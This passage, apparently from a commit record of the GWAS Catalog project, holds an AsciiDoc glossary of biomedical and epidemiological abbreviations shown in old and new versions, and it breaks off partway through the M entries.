volume\n\n\nAlkPhos: Alkaline phosphatase\n\n\nAMD: Age-related macular degeneration\n\n\nANC: Absolute neutrophil count\n\n\nANP6: N-terminal pro-atrial natriuretic peptide\n\n\nAngCAD: angiographic coronary disease\n\n\nAOI: age of smoking initiation\n\n\napoA-1: apolipoprotein A-1\n\n\naPTT: activated partial thromboplastin time\n\n\nARC: AR-C124910XX\n\n\nASD: Ostium secundum atrial septal defect\n\n\nAST: aspartate aminotransferase\n\n\nAt: antithrombin\n\n\nATA: anti-topoisomerase antibodies\n\n\nATBV: temporal brain volume\n\n\nATCBV: total cerebral brain volume\n\n\nATVB: multivariable-adjusted temporal brain volume\n\n\nAUC: area under the curve\n\n=== B\n\nBABF: baseline brachial artery flow velocity\n\n\nBARS: Barnes Akathisia Scale\n\n\nBB:\tbeta blockers\n\n\nBD: bipolar disorder\n\n\nBD-RT: bone density estimated by T score at distal radius\n\n\nBD-TT: bone density estimated by T score at midshaft tibia\n\n\nBMD: bone mineral density\n\n\nBMI: body mass index\n\n\nBMR: basal metabolic rate\n\n\nBMR RQ: respiratory quotient during basal metabolic rate measurement\n\n\nBPV: brain parenchymal volume\n\n\nBRCA1\/2: breast cancer 1 gene and breast cancer 2 gene\n\n\nBUA: Broadband ultrasound attenuation\n\n\nBUN: blood urea nitrogen\n\n=== C\n\nC: cholesterol\n\n\nC3: Propionylcarnitine\n\n\nC4: Butyrylcarnitine\n\n\nC9: Nonaylcarnitine\n\n\nC10: Decanoylcarnitine\n\n\nC10:2: Decadienylcarnitine\n\n\nC12: Dodecanoylcarnitine\n\n\nC14:1-OH: Hydroxytetradecenoylcarnitine\n\n\nCA19-9: cancer antigen 19-9\n\n\nCAC: coronary artery calcification\n\n\nCAL:coronary artery lesions\n\n\nCB-PWV: carotid brachial pulse wave velocity\n\n\nCBT: Cortical thickness of the tibia\n\n\nCC16: Clara cell secretory 
protein\n\n\nCCA: common carotid artery\n\n\nCCA IMT: common carotid artery intimal medial thickness\n\n\nCCB: calcium channel blockers\n\n\nCCT: central corneal thickness\n\n\nCD40L: Ligand, serum & plasma\n\n\ncDAS28: Disease Activity Score\n\n\nCDC: Complicated disease course\n\n\nCE: cholesterol ester\n\n\nCEA: carcinoembryonic antigen\n\n\nCer: ceramide\n\n\nCERAD-dr: Consortium to Establish a Registry for Alzheimer\u2019s Disease delayed recall\n\n\nCEU: CEPH (Centre d'Etude du Polymorphisme Humain) from Utah\n\n\nCF-PWVLTA: carotid-femoral pulse wave velocity, long-term average\n\n\nCGI: Clinical Global Impressions-Severity\n\n\nCHS1: 1st principal component on transformed hue and saturation values\n\n\nCK: creatinine kinase\n\n\nCKD: chronic kidney disease\n\n\ncHAQ: health assessment questionnaire score\n\n\ncHL: Classical Hodgkin lymphoma\n\n\nCIGSTAT: former\/current smokers\n\n\ncIMT: carotid intima media thickness\n\n\nCL: cleft lip without cleft palate\n\n\nCL\/P: cleft lip with or without cleft palate\n\n\nCOWA: total number of correct words across three letters\n\n\nCP: cleft palate\n\n\nCPd: Chronic periodontitis\n\n\nCPD: cigarettes per day\n\n\nCPDBI: 10 or more cigarettes per day\n\n\nCRP: C-reactive protein\n\n\nCRP average 2,6,7: C-reactive protein (CRP) averaged from 3 examinations (over about 20 years)\n\n\nCRP2: C-reactive protein, offspring exam 2\n\n\nCRP average 2,6,7: C-reactive protein average exam 2,6,7\n\n\nCRP6: C-reactive protein exam 6\n\n\nCS: cardioembolic stroke\n\n\ncSJC: Swollen joint count\n\n\ncTJC: Tender joint count\n\n\nCVD: cardiovascular disease\n\n\nCVLT-dr: California Verbal Learning Test delayed recall (belongs to WL-dr category)\n\n=== D\n\nD: particle diameter\n\n\nDBP: diastolic blood pressure\n\n\nDBPLTA: diastolic blood pressure, long-term average\n\n\nD.f.: Dermatophagoides farina\n\n\nDG: Desialylated 2AB-labelled human plasma N-glycans groups\n\n\nDGI+FUSION+WTCCC: combined results from the DGI, FUSION, WTCCC analyses\n\n\nDHEA-S: dehydroisoandrosterone sulfate\n\n\nDI: Disposition index\n\n\nDM: diabetes mellitus\n\n\nD.p.: Dermatophagoides pteronyssinus\n\n\nDWRT-dr: Delayed Word Recall Test (belongs to WL-dr category)\n\n\nDXA: dual energy X-ray absorptiometry\n\n=== E\n\nEA: European Ancestry\n\n\nEBV: Epstein-Barr virus\n\n\nEDS: excessive daytime sleepiness\n\n\nEEG: electroencephalography\n\n\nEER: estimated energy requirement\n\n\neGFR: glomerular filtration rate\n\n\neGFRcrea: estimated glomerular filtration rate based on serum creatinine\n\n\neGFRcys: serum cystatin C\n\n\nEIM: Extraintestinal manifestations\n\n\nEM: Elated mania\n\n\nER +ve: Estrogen receptor positive\n\n\nER -ve: Estrogen receptor negative\n\n\nET-1: Endothelin-1\n\n\nET: endocrine treatment\n\n\nESCC: esophageal squamous cell carcinoma\n\n\nESRD: end-stage renal disease\n\n\nESS: Epworth Sleepiness Scale\n\n\nEst-C: esterified cholesterol\n\n\nEVNV: ever smokers, never smokers\n\n=== F\n\nF2: Factor 2 (visual memory and organization)\n\n\nF3: Factor 3 (measure of attention and executive function - Trails A and B)\n\n\nFA: female athletes\n\n\nFC: free cholesterol\n\n\nFEF: forced expiratory flow\n\n\nFEV1: forced expiratory volume in 1 second\n\n\nfev1slope: longitudinal slope of forced expiratory volume in one second\n\n\nFG: fibrinogen\n\n\nFI: fasting insulin\n\n\nFLE: female long endurance athletes\n\n\nFN: femoral neck\n\n\nFNBMDm: femoral bone mineral density in males\n\n\nFPG: fasting plasma glucose\n\n\nfPS: free Protein S\n\n\nFree T3: fasting 
serum free triiodothyronine\n\n\nFS: female-only stroke\n\n\nFSD: female sexual dysfunction\n\n\nFSG: fasting serum glucose\n\n\nFSH: follicle-stimulating hormone\n\n\nFSIGT: frequently sampled intravenous glucose tolerance test\n\n\nFt3: free thyroxine 3\n\n\nFt4: free thyroxine\n\n\nFTD: frontotemporal dementia\n\n\nFUC-A: Antennary fucosylated glycans\n\n\nfuncPS: functional Protein S\n\n\nFVC: forced vital capacity\n\n\nFVII: Coagulation factors VII\n\n\nFWLTA: forward wave amplitude, long-term average\n\n=== G\n\nG3D: grade 3 diarrhea\n\n\nGBA: glucocerebrosiadase\n\n\nGGT: glutamyltranspeptidase\n\n\nGlc: Glucose\n\n\nGln: Glutamine\n\n\nGLU: glucose\n\n\nGluCer: glucosylceramide\n\n\nGOT (AST): Glutamyl oxaloacetic transaminase, Aspartate aminotransferase\n\n\nGPT (ALT): glutamate pyruvate transaminase, alanine aminotransferase\n\n\nGP130: glycoprotein 130\n\n\nGSE: general side effect burden\n\n=== H\n\nHAM-A: Hamilton Anxiety Scale\n\n\nHbA1C: hemoglobin A1c\n\n\nHbF: fetal hemoglobin\n\n\nHcy: homocysteine\n\n\nHDL-C: Total cholesterol in HDL\n\n\nHER2: human epidermal growth factor receptor 2\n\n\nHgb: Hemoglobin\n\n\nHis: Histidine\n\n\nHOMA-IR: homeostasis model assessment of insulin resistance\n\n\nHIV: human immunodeficiency virus\n\n\nHDL: high density lipoprotein\n\n\nHOMA-B: homeostasis model assessment of beta-cell function\n\n\nHR: hormone receptor\n\n\nHRmax: maximum heart rate during treadmill fitness test\n\n\nHt: hematocrit\n\n\nHU: Hounsfield units\n\n\nHVA: homovanillic acid\n\n\nHVLT-dr: Hopkins Verbal Learning Test delayed recall (belongs to WL-dr category)\n\n=== I\n\nICAIMT: internal cartotid artery internal and common carotid intimal medial thickness\n\n\nICAM: Intercellular adhesion molecule\n\n\nIED: intra-extradimensional set shifting\n\n\nIGF1: insulin-like growth factor I precursor\n\n\nIGFBP-1: fasting serum insulin-like growth factor binding protein-1\n\n\nIGFBP-3: fasting serum insulin-like growth factor binding protein-3\n\n\nIL6: Interleukin-6 precursor\n\n\nIL8: Interleukin-8 precursor\n\n\nIL10: Interleukin-10 precursor\n\n\nIL12: interleukin-12 precursor\n\n\nIL18: Interleukin-18 precursor\n\n\nIL1B: Interleukin-1, beta\n\n\nIL1RA: interleukin-1 receptor antagonist protein precursor\n\n\nIM: irritable mania\n\n\nIMT: Carotid intimal medial thickness\n\n\nINS: insulin\n\n\nint: interaction\n\n\nIR: insulin resistance\n\n\nIS: all ischemic stroke\n\n\nISI_0-120: 0-120 min insulin sensitivity index\n\n=== K\n\nKD: Kawasaki disease\n\n=== L\n\nLA: linoleic acid\n\n\nLAA: large artery atherosclerosis\n\n\nLAD: left atrial diameter\n\n\nLC: lung cancer\n\n\nLDL: low density lipoprotein\n\n\nLDL-C: Total cholesterol in LDL\n\n\nLF\/HF: ratio of low frequency to high frequency power\n\n\nL-LDL-FC: The free cholesterol content of large LDL\n\n\nL-HDL-L: Total lipids in large HDL\n\n\nLp(a): lipoprotein (a)\n\n\nLS: lumbar spine\n\n\nLTG: lamotrigine-induced hypersensitivity\n\n\nLTL: leukocyte telomere length\n\n\nLVEF: Left ventricular ejection fraction\n\n\nLVD: large-vessel disease\n\n\nLVDD: left ventricular diastolic diameter\n\n\nLVFS: left ventricular fractional shortening\n\n\nLVM: left ventricular mass\n\n\nLVMI: left ventricular mass index\n\n\nLVSD: left ventricular systolic dimension\n\n\nLYM: Lymphoma subtypes\n\n=== M\n\nM: from clamp\n\n\nMA: male athletes\n\n\nMAP: mean arterial pressure\n\n\nMAPLTA: mean arterial pressure, long-term average\n\n\nmaxL*: maximum L* (reflectance)\n\n\nMC: mother's criticism\n\n\nMCH: mean corpuscular 
hemoglobin\n\n\nMCHC: mean corpuscular hemoglobin concentra\u00adtion\n\n\nMCI: mild cognitive impairment\n\n\nMCS: Mental Component Summary\n\n\nMCV: mean corpuscular volume\n\n\nMCP1: monocyte chemoattractant protein-1\n\n\nMDC: Mild disease course\n\n\nmeanFVC: mean forced vital capacity from 2 exams\n\n\nmeanratio: mean FEV1\/FVC from 2 exams\n\n\nMETH: Methamphetamine\n\n\nMHBMA: 2-(N-acetyl-L-cystein-S-yl)-1-hydroxybut-3-ene and 1-(N-acetyl-L-cystein-S-yl)-1-hydroxybut-3-ene\n\n\nM-HDL-L: Total lipids in medium HDL\n\n\nMHPG: 3-methoxy-4-hydroxyphenlglycol\n\n\nMI: myocardial infarction\n\n\nMIP-1b: macrophage inflammatory protein beta\n\n\nM-LDL-C: Total cholesterol in medium LDL\n\n\nM-LDL-PL: Phospholipids in medium LDL\n\n\nMLE: male long endurance athletes\n\n\nMobCH: double-bond protons of mobile lipids\n\n\nMMnb: mismatch negativity (300-710 ms)\n\n\nMMR: measles, mumps and rubella vaccination\n\n\nMMSE: Mini-mental state examination\n\n\nMSE: middle and short endurance athletes\n\n\nMSSS: Multiple Sclerosis Severity Scale\n\n\nM-VLDL-PL: Phospholipids in medium VLDL\n\n\nMW: mother's warmth\n\n=== N\n\nNA: not applicable\n\n\nNAP: non-albumin protein\n\n\nNam: Boston Naming Test\n\n\nNCI: neurocognitive impairment\n\n\nNeckZ1: Neck section modulus\n\n\nNeckZ1rf: neck section modulus in females\n\n\nNeckW1rf: neck width in females\n\n\nNeckZ1rm: neck section modulus in males\n\n\nNEFA: fasting serum nonesterified fatty acids\n\n\nNFT: neurofibrillary tangles\n\n\nNHL: Non-Hodgkin's Lymphoma\n\n\nNL: neck length\n\n\nNPC: nasopharyngeal carcinoma\n\n\nNPG: normal-pressure glaucoma\n\n\nNR: not reported\n\n\nNS: none significant\n\n\nNSA: neck shaft angle\n\n\nNSAm: neck-shaft angle in males\n\n\nNSCL\/P: nonsyndromic cleft lip with or without cleft palate\n\n\nNW: neck width\n\n\nNvrb: Non Verbal\n\n=== O\n\nOCPD: Childhood Obsessive-Compulsive Personality Disorder\n\n\nOR: odds ratio\n\n=== P\n\nP: particle concentration\n\n\nP3MRSBP: post exercise 3 minute recovery systolic blood pressure\n\n\nPAD: peripheral artery disease\n\n\nPAI-1: plasminogen activator inhibitor\n\n\nPAL: paired associates learning\n\n\nPAR-dr: paragraph delayed recall\n\n\nPC: Protein C\n\n\nPC1: principal component axis 1, CANTAB measures\n\n\nPC2: principal component analysis 2\n\n\nPC3: principal component analysis 3\n\n\nPC aa C36:3: Phosphatidylcholine diacyl C36:3\n\n\nPC aa C36:4: Phosphatidylcholine diacyl C34:4\n\n\nPCS: Physical Component Summary\n\n\nPCV: packed cell volume\n\n\nPD: Parkinson\u2019s disease\n\n\nP gingi: Porphyromonas gingivalis\n\n\nPhe: Phenylalanine\n\n\nPHT: phenytoin-induced hypersensitivity\n\n\nPKYRS: pack-years\n\n\nPL: phospholipid\n\n\nPLT: platelets\n\n\npltadp: platelet aggregation (ADP-induced)\n\n\npltcoll: platelet aggregation (collagen-induced)\n\n\nPP: pulse pressure\n\n\nppfef: percent predicted FEF25-75\u00ad for latest exam\n\n\nppfefrat: percent predicted FEF25-75\u00ad\/FVC for latest exam\n\n\nppfvc: percent predicted FVC for latest exam\n\n\nppfev1: percent predicted FEV1 for latest exam\n\n\nppFEV1\/FEC\/FEE: percent predicted FEV1\/FVC\/FEF\n\n\nppratio: percent predicted FEV1\/FVC for latest exam\n\n\nPRM: pattern recognition memory\n\n\nPROP: propylthiouracil solution\n\n\nPS: protein S\n\n\nPSC: primary sclerosing cholangitis\n\n\nPT: prothrombin time\n\n\nPUFA: polyunsaturated fatty acids\n\n\npvRSA\/HF: peak-valley respiratory sinus arrhythmia or high frequency power\n\n=== Q\n\nQC: quality control\n\n\nQUICKI: fasting serum quantitative insulin 
sensitivity check index\n\n=== R\n\nRA: Rheumatoid arthritis\n\n\nRANTES: fasting serum regulated upon activation, normal T-cell expressed and secreted\n\n\nRAVLT-dr: Rey\u2019s Auditory Verbal Learning Test delayed recall (belongs to WL-dr category)\n\n\nRBC: red blood cell\n\n\nRBCC: red blood cell count\n\n\nRDW: red cell distribution width\n\n\nRMSSD: root mean square of the successive differences of inter beat intervals\n\n\nRQmax: maximum respiratory quotient during treadmill fitness test\n\n\nRVP: rapid visual processing\n\n\nRW: reflected wave amplitude\n\n\nRWLTA: reflected wave amplitude, long-term average\n\n=== S\n\nS2EHR: Stage 2 exercise heart rate\n\n\nS2ESBP: stage 2 exercise systolic blood pressure\n\n\nSBM: subset-based meta-analysis approach\n\n\nSDNN: standard deviation of the normal-to-normal inter beat intervals\n\n\nserum TG: serum total triglyceride content\n\n\nSAS: Simpson-Angus Scale\n\n\nSBP: systolic blood pressure\n\n\nSBPLTA: systolic blood pressure, long-term average\n\n\nsCR: serum creatinine\n\n\nSCZ and BD: Schizophrenia and Bipolar disorder\n\n\ns.d.: standard deviation\n\n\nSE: sleep efficiency\n\n\nSG: Glucose effectiveness\n\n\nShaftW1: Shaft width combined\n\n\nShaftW1f: shaft width in females\n\n\nShaftZ1rf: shaft section modulus in females\n\n\nShaftZ1R: shaft section modulus\n\n\nSHBG: sex hormone binding globulin\n\n\nSI: SI from FSIGT\n\n\nsICAM-1: fasting serum soluble intercellular adhesion molecule-1\n\n\nsIL-6R: soluble interleukin\n\n\nSim: Similarities\n\n\nSleep RQ: respiratory quotient during sleep\n\n\nSLE: systemic lupus erythematosus\n\n\nSM-1: butyrylcarnitine \/ propionylcarnitine\n\n\nSM-2: N-acetylornithine\n\n\nSM-3: 1-arachidonoylglycero phosphoethanolamine \/ 1-linoleoylglycerophospho-ethanolamine\n\n\nSM-4: bilirubin (E,E) \/ oleoylcarnitine\n\n\nSM-5: hexanoylcarnitine \/ oleate (18:1n9)\n\n\nSM-6: myristate (14:0) \/ myristoleate (14:1n5)\n\n\nSM-7: 1-methylxanthine \/ 4-acetamidobutanoate\n\n\nSM-8: ADpSGEGDFXAEGGGVR \/ ADSGEGDFXAEGGGVR\n\n\n\nSM-9: 10-nonadecenoate (19:1n9) \/ 10-undecenoate (11:1n1)\n\n\nSM-10: eicosenoate (20:1n9 or 11) \/ tetradecanedioate\n\n\nSM-11: ADpSGEGDFXAEGGGVR \/ ADSGEGDFXAEGGGVR\n\n\nSM-12: ADSGEGDFXAEGGGVR \/ DSGEGDFXAEGGGVR\n\n\nSM-13: androsterone sulfate \/ epiandrosterone sulfate\n\n\nSM-14: ADpSGEGDFXAEGGGVR \/ DSGEGDFXAEGGGVR\n\n\nSM-15: 1-eicosatrienoylglycero-phosphocholine \/ 1-linoleoylglycero phosphocholine\n\n\nSM-16: docosahexaenoate (DHA; 22:6n3) \/ eicosapentaenoate (EPA; 20:5n3)\n\n\nSM-17: 3-(4-hydroxyphenyl)lactate \/ isovalerylcarnitine\n\n\nSMKAGE: age of initiation (years)\n\n\nSMKDU: duration (years)\n\n\nSM: sphingomyelin\n\n\nSpc: spectrum\n\n\nSP-D: surfactant protein D\n\n\nSPEED: processing speed\n\n\nSRM: spatial recognition memory\n\n\nSSP: spatial span\n\n\nSSRI: selective serotonin reuptake inhibitor\n\n\nsTfR: Soluble Transferrin Receptor\n\n\nsTie-2: soluble receptor Tie-2\n\n\nStr: strict\n\n\nSVD: small-vessel disease\n\n\nSWM: spatial working memory\n\n=== T\n\nTAT: Total adipose tissue area\n\n\nTBLH-BMD: total-body less head bone mineral density\n\n\nTB-LM: total-body lean mass\n\n\nTC: total cholesterol\n\n\nTEE: 24-h total energy expenditure\n\n\ntFPG: 28 year time averaged fasting plasma glucose (FPG)\n\n\nTG: triglycerides\n\n\nTGF-b1: transforming growth factor\n\n\nTG\/HDLC: fasting serum triglycerides\/high density lipoprotein cholesterol\n\n\nTIDN: Type 1 diabetes diabetic nephropathy\n\n\nTotal PS: Total Protein S\n\n\nTotal T3: fasting serum 
triiodothyronine\n\n\nTotal T4: fasting serum thyroxine\n\n\nTP: total protein\n\n\ntPA: tissue plasminogen activator\n\n\nTNFA: tumor necrosis factor alpha\n\n\nTRBMD: Trochanter bone mineral density\n\n\nTRBMDm: Trochanter bone mineral density males\n\n\nTSH: thyroid stimulating hormone\n\n\nTyr: Tyrosine\n\n=== U\n\nUAE: urinary albumin excretion\n\n=== V\n\nVal: Valine\n\n\nvBMD: volumetric bone mineral density\n\n\nVitD250H: Vitamin D plasma 25(OH)-D\n\n\nVitkPhylloq: Vitamin K plasma phylloquinone\n\n\nVLDL: very-low-density lipoprotein\n\n\nVLDL-D: Mean diameter for VLDL particles\n\n\nVO2max: maximum oxygen consumption during treadmill fitness test\n\n\nVOS: velocity of sound\n\n\nVPWL-dr: delayed recall for visually presented word list\n\n\nVrb: verbal\n\n\nVRM: verbal recall\n\n\nvWF: Willebrand factor\n\n=== W\n\nWBC: white blood cell\n\n\nWC: waist circumference\n\n\nWCadjBMI: WC adjustment for BMI\n\n\nWF: weight fluctuation\n\n\nWGHS: Women's Genome Health Study\n\n\nWHR: waist hip ratio\n\n\nWHRadjBMI: WHR adjustment for BMI\n\n\nWIT: word interference test\n\n\nWL-dr: word list delayed recall\n\n\nWRAT: Wide-Range Achievement Test\n\n=== XYZ\n\nXL-HDL-CE: The cholesterol ester content of extra large HD\n\n\nXL-HDL-TG: Triglycerides in very large HDL\n\n\nXXL-VLDL-P: extremely large VLDL particles\n\n\nYKL-40: (Chitinase 3-like 1) protein levels\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7525d99d2d5f991690c8423e0232e594c5953b72","subject":"Update abbreviations-content.adoc","message":"Update abbreviations-content.adoc","repos":"EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci","old_file":"goci-interfaces\/goci-ui\/src\/main\/docs\/abbreviations-content.adoc","new_file":"goci-interfaces\/goci-ui\/src\/main\/docs\/abbreviations-content.adoc","new_contents":"= Abbreviations\n\n== Full Description of Abbreviations used in the Catalog\n\n<<Special Characters>>, <<A>>, <<B>>, <<C>>, <<D>>, <<E>>, <<F>>, <<G>>, <<H>>, <<I>>, <<K>>, <<L>>, <<M>>, <<N>> ,<<O>>, <<P>>, <<Q>>, <<R>>, <<S>>, <<T>>, <<U>>, <<V>>, <<W>>, <<XYZ>>\n\n=== Special Characters\n\n?: A risk allele not reported\n\n\n5-HIAA: 5-hydroxyindoleacetic acid\n\n=== A\n\nAA: African-American\n\n\nAAM-BR: Age at menarche and buckling ratio\n\n\nAAM-CT: Age at menarche and cortical thickness\n\n\nAAM-W: Age at menarche and periosteal diameter\n\n\nAAT: alanine aminotransferase\n\n\nAAC: abdominal aortic calcium\n\n\nA action: Aggregatibacter actinomycetemcomitans\n\n\nAb: Amyloid-beta\n\n\nABI: ankle brachial index\n\n\nACE: Angiotensin-converting enzyme\n\n\nACPA: antibodies to citrullinated peptide antigens\n\n\nACVn: normalised agkistrodon contortrix venom ratio\n\n\nAD: Alzheimer's Disease\n\n\nADM: Adrenomedullin\n\n\nAF: atrial fibrillation\n\n\nAFBV: Frontal Brain volume\n\n\nAFP: ? 
fetoprotein\n\n\nAFVB: multivariable-adjusted frontal brain volume\n\n\nAIMS: Abnormal Involuntary Movements Scale\n\n\nAIRg: Acute insulin response\n\n\nAla: Alaine\n\n\nALB: albumin\n\n\nALB\/GLB: serum albumin:globulin ratio\n\n\nALL: all ancestries\n\n\nALL-dr: combined tests of verbal delayed recall\n\n\nALLV: adjusted log lateral ventricular volume\n\n\nALP: alkaline phosphatase\n\n\nAlpha-TOH: alpha-tocopherol\n\n\nALT: alanine aminotransferase\n\n\nALTHBV: multivariable-adjusted temporal horn volume\n\n\nAlkPhos: Alkaline phosphatase\n\n\nAMD: Age-related macular degeneration\n\n\nANP6: N-terminal pro-atrial natriuretic peptide\n\n\nAngCAD: angiographic coronary disease\n\n\nAOI: age of smoking initiation\n\n\napoA-1: apolipoprotein A-1\n\n\naPTT: activated partial thromboplastin time\n\n\nASD: Ostium secundum atrial septal defect\n\n\nAST: aspartate aminotransferase\n\n\nAt: antithrombin\n\n\nATBV: temporal brain volume\n\n\nATCBV: total cerebral brain volume\n\n\nATVB: multivariable-adjusted temporal brain volume\n\n=== B\n\nBABF: baseline brachial artery flow velocity\n\n\nBARS: Barnes Akathisia Scale\n\n\nBD: bipolar disorder\n\n\nBD-RT: bone density estimated by T score at distal radius\n\n\nBD-TT: bone density estimated by T score at midshaft tibia\n\n\nBMD: bone mineral density\n\n\nBMI: body mass index\n\n\nBMR: basal metabolic rate\n\n\nBMR RQ: respiratory quotient during basal metabolic rate measurement\n\n\nBPV: brain parenchymal volume\n\n\nBRCA1\/2: breast cancer 1 gene and breast cancer 2 gene\n\n\nBUA: Broadband ultrasound attenuation\n\n\nBUN: blood urea nitrogen\n\n=== C\n\nC: cholesterol\n\n\nC3: Propionylcarnitine\n\n\nC4: Butyrylcarnitine\n\n\nC9: Nonaylcarnitine\n\n\nC10: Decanoylcarnitine\n\n\nC10:2: Decadienylcarnitine\n\n\nC12: Dodecanoylcarnitine\n\n\nC14:1-OH: Hydroxytetradecenoylcarnitine\n\n\nCA19-9: cancer antigen 19-9\n\n\nCAC: coronary artery calcification\n\n\nCAL:coronary artery lesions\n\n\nCB-PWV: carotid brachial pulse wave velocity\n\n\nCBT: Cortical thickness of the tibia\n\n\nCC16: Clara cell secretory protein\n\n\nCCA: common carotid artery\n\n\nCCA IMT: common carotid artery intimal medial thickness\n\n\nCCT: central corneal thickness\n\n\nCD40L: Ligand, serum & plasma\n\n\ncDAS28: Disease Activity Score\n\n\nCDC: Complicated disease course\n\n\nCE: cholesterol ester\n\n\nCEA: carcinoembryonic antigen\n\n\nCer: ceramide\n\n\nCERAD-dr: Consortium to Establish a Registry for Alzheimer\u2019s Disease delayed recall\n\n\nCEU: CEPH (Centre d'Etude du Polymorphisme Humain) from Utah\n\n\nCF-PWVLTA: carotid-femoral pulse wave velocity, long-term average\n\n\nCHS1: 1st principal component on transformed hue and saturation values\n\n\nCK: creatinine kinase\n\n\nCKD: chronic kidney disease\n\n\ncHAQ: health assessment questionnaire score\n\n\ncHL: Classical Hodgkin lymphoma\n\n\nCIGSTAT: former\/current smokers\n\n\ncIMT: carotid intima media thickness\n\n\nCL: cleft lip without cleft palate\n\n\nCL\/P: cleft lip with or without cleft palate\n\n\nCOWA: total number of correct words across three letters\n\n\nCP: cleft palate\n\n\nCPd: Chronic periodontitis\n\n\nCPD: cigarettes per day\n\n\nCPDBI: 10 or more cigarettes per day\n\n\nCRP: C-reactive protein\n\n\nCRP average 2,6,7: C-reactive protein (CRP) averaged from 3 examinations (over about 20 years)\n\n\nCRP2: C-reactive protein, offspring exam 2\n\n\nCRP average 2,6,7: C-reactive protein average exam 2,6,7\n\n\nCRP6: C-reactive protein exam 6\n\n\nCS: cardioembolic stroke\n\n\ncSJC: Swollen joint 
count\n\n\ncTJC: Tender joint count\n\n\nCVD: cardiovascular disease\n\n\nCVLT-dr: California Verbal Learning Test delayed recall (belongs to WL-dr category)\n\n=== D\n\nD: particle diameter\n\n\nDBP: diastolic blood pressure\n\n\nDBPLTA: diastolic blood pressure, long-term average\n\n\nD.f.: Dermatophagoides farina\n\n\nDG: Desialylated 2AB-labelled human plasma N-glycans groups\n\n\nDGI+FUSION+WTCCC: combined results from the DGI, FUSION, WTCCC analyses\n\n\nDHEA-S: dehydroisoandrosterone sulfate\n\n\nDI: Disposition index\n\n\nDM: diabetes mellitus\n\n\nD.p.: Dermatophagoides pteronyssinus\n\n\nDWRT-dr: Delayed Word Recall Test (belongs to WL-dr category)\n\n\nDXA: dual energy X-ray absorptiometry\n\n=== E\n\nEA: European Ancestry\n\n\nEBV: Epstein-Barr virus\n\n\nEDS: excessive daytime sleepiness\n\n\nEER: estimated energy requirement\n\n\neGFR: glomerular filtration rate\n\n\neGFRcrea: estimated glomerular filtration rate based on serum creatinine\n\n\neGFRcys: serum cystatin C\n\n\nEIM: Extraintestinal manifestations\n\n\nEM: Elated mania\n\n\nET-1: Endothelin-1\n\n\nESCC: esophageal squamous cell carcinoma\n\n\nESRD: end-stage renal disease\n\n\nESS: Epworth Sleepiness Scale\n\n\nEst-C: esterified cholesterol\n\n\nEVNV: ever smokers, never smokers\n\n=== F\n\nF2: Factor 2 (visual memory and organization)\n\n\nF3: Factor 3 (measure of attention and executive function - Trails A and B)\n\n\nFA: female athletes\n\n\nFC: free cholesterol\n\n\nFEF: forced expiratory flow\n\n\nFEV1: forced expiratory volume in 1 second\n\n\nfev1slope: longitudinal slope of forced expiratory volume in one second\n\n\nFG: fibrinogen\n\n\nFI: fasting insulin\n\n\nFLE: female long endurance athletes\n\n\nFN: femoral neck\n\n\nFNBMDm: femoral bone mineral density in males\n\n\nFPG: fasting plasma glucose\n\n\nfPS: free Protein S\n\n\nFree T3: fasting serum free triiodothyronine\n\n\nFS: female-only stroke\n\n\nFSD: female sexual dysfunction\n\n\nFSG: fasting serum glucose\n\n\nFSH: follicle-stimulating hormone\n\n\nFt3: free thyroxine 3\n\n\nFt4: free thyroxine\n\n\nFUC-A: Antennary fucosylated glycans\n\n\nfuncPS: functional Protein S\n\n\nFVC: forced vital capacity\n\n\nFVII: Coagulation factors VII\n\n\nFWLTA: forward wave amplitude, long-term average\n\n=== G\n\nG3D: grade 3 diarrhea\n\n\nGGT: glutamyltranspeptidase\n\n\nGlc: Glucose\n\n\nGln: Glutamine\n\n\nGLU: glucose\n\n\nGluCer: glucosylceramide\n\n\nGOT (AST): Glutamyl oxaloacetic transaminase, Aspartate aminotransferase\n\n\nGPT (ALT): glutamate pyruvate transaminase, alanine aminotransferase\n\n\nGP130: glycoprotein 130\n\n\nGSE: general side effect burden\n\n=== H\n\nHbA1C: hemoglobin A1c\n\n\nHbF: fetal hemoglobin\n\n\nHcy: homocysteine\n\n\nHDL-C: Total cholesterol in HDL\n\n\nHgb: Hemoglobin\n\n\nHis: Histidine\n\n\nHOMA-IR: homeostasis model insulin resistance\n\n\nHIV: human immunodeficiency virus\n\n\nHDL: high density lipoprotein\n\n\nHOMA-B: beta-cell function\n\n\nHRmax: maximum heart rate during treadmill fitness test\n\n\nHt: hematocrit\n\n\nHU: Hounsfield units\n\n\nHVA: homovanillic acid\n\n\nHVLT-dr: Hopkins Verbal Learning Test delayed recall (belongs to WL-dr category)\n\n=== I\n\nICAIMT: internal cartotid artery internal and common carotid intimal medial thickness\n\n\nICAM: Intercellular adhesion molecule\n\n\nIED: intra-extradimensional set shifting\n\n\nIGF1: insulin-like growth factor I precursor\n\n\nIGFBP-1: fasting serum insulin-like growth factor binding protein-1\n\n\nIGFBP-3: fasting serum insulin-like growth factor 
binding protein-3\n\n\nIL6: Interleukin-6 precursor\n\n\nIL8: Interleukin-8 precursor\n\n\nIL10: Interleukin-10 precursor\n\n\nIL12: interleukin-12 precursor\n\n\nIL18: Interleukin-18 precursor\n\n\nIL1B: Interleukin-1, beta\n\n\nIL1RA: interleukin-1 receptor antagonist protein precursor\n\n\nIM: irritable mania\n\n\nIMT: Carotid intimal medial thickness\n\n\nINS: insulin\n\n\nint: interaction\n\n\nIR: insulin resistance\n\n\nIS: all ischemic stroke\n\n\nISI_0-120: 0-120 min insulin sensitivity index\n\n=== K\n\nKD: Kawasaki disease\n\n=== L\n\nLA: linoleic acid\n\n\nLAA: large artery atherosclerosis\n\n\nLAD: left atrial diameter\n\n\nLC: lung cancer\n\n\nLDL: low density lipoprotein\n\n\nLDL-C: Total cholesterol in LDL\n\n\nLF\/HF: ratio of low frequency to high frequency power\n\n\nL-LDL-FC: The free cholesterol content of large LDL\n\n\nL-HDL-L: Total lipids in large HDL\n\n\nLS: lumbar spine\n\n\nLTG: lamotrigine-induced hypersensitivity\n\n\nLTL: leukocyte telomere length\n\n\nLVD: large-vessel disease\n\n\nLVDD: left ventricular diastolic diameter\n\n\nLVFS: left ventricular fractional shortening\n\n\nLVM: left ventricular mass\n\n\nLVMI: left ventricular mass index\n\n\nLVSD: left ventricular systolic dimension\n\n\nLYM: Lymphoma subtypes\n\n=== M\n\nM: from clamp\n\n\nMA: male athletes\n\n\nMAP: mean arterial pressure\n\n\nMAPLTA: 